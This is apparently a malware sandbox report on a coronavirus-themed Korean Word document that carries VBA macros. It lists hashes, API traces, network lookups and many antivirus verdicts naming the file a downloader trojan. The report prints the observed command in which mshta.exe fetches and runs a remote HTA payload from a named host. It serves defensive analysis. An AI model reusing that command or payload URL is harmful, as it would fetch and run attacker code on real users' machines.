Summary | ZeroBOX

코로나바이러스 대응.doc

Category Machine Started Completed
FILE s1_win7_x6401 April 8, 2021, 1:27 p.m. April 8, 2021, 1:29 p.m.
Size 81.1KB
Type Microsoft Word 2007+
MD5 a9dac36efd7c99dc5ef8e1bf24c2d747
SHA256 2cd5f1852ac6d3ed481394ea0abc49f16789c12fb81bcdf9988762730fb0aa8f
CRC32 7C042A49
ssdeep 1536:ZuhlSoXDXEs55wizRaLYswCcxWLQzWLa0MJ5GbXoWY8GNG4:qjT9tts/ENzFR8D28CG4
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Name Response Post-Analysis Lookup
vnext.mireene.com 101.79.5.222
IP Address Status Action
101.79.5.222 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c9b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ca05000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x732d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c981000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c8d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1892
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72472000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$나바이러스 대응.doc
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003ec
filepath: C:\Users\test22\AppData\Local\Temp\~$나바이러스 대응.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$나바이러스 대응.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
cmdline "C:\Windows\System32\mshta.exe" http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002d0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
com_class WScript.Shell May attempt to create new processes
cve CVE-2013-3906
parent_process winword.exe martian_process "C:\Windows\System32\mshta.exe" http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.33572223
FireEye Trojan.GenericKD.33572223
CAT-QuickHeal O97M.Downloader.36951
McAfee RDN/Generic Downloader.x
Sangfor Malware.Generic-Macro.Save.7f97160f
Alibaba TrojanDownloader:VBA/Obfuscation.A
Arcabit HEUR.VBA.CG.1
Cyren PP97M/Downldr.gen
Symantec W97M.Downloader
Avast Other:Malware-gen [Trj]
ClamAV Doc.Dropper.Agent-7601883-0
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Trojan.GenericKD.33572223
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
AegisLab Trojan.Script.Generic.a!c
Tencent Heur:Trojan.Script.LS_Gencirc.7162455.0
Ad-Aware Trojan.GenericKD.33572223
Sophos Troj/DocDl-XPS
Comodo Malware@#1oi6zkr5uwftx
TrendMicro HEUR_VBA.O2
McAfee-GW-Edition BehavesLike.Downloader.mc
Emsisoft Trojan.GenericKD.33572223 (B)
SentinelOne Static AI - Malicious OPENXML
MAX malware (ai score=100)
Antiy-AVL Trojan[Downloader]/Script.AGeneric
Microsoft TrojanDownloader:O97M/Obfuse!MTB
ViRobot W97M.S.Downloader.83081
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
GData Trojan.GenericKD.33572223
AhnLab-V3 Downloader/Doc.Generic
ALYac Trojan.Downloader.DOC.Gen
TACHYON Suspicious/WOX.Obfus.Gen.8
Zoner Probably Heur.W97Obfuscated
ESET-NOD32 VBA/TrojanDownloader.Agent.RVA
Rising Downloader.Obfuse!8.105AD (TOPIS:E0:FjHecNdIxsO)
Ikarus Trojan-Downloader.O97M.Obfuse
Fortinet W32/Agent.RVA!tr
AVG Other:Malware-gen [Trj]
Qihoo-360 virus.office.obfuscated.1
file C:\Windows\System32\mshta.exe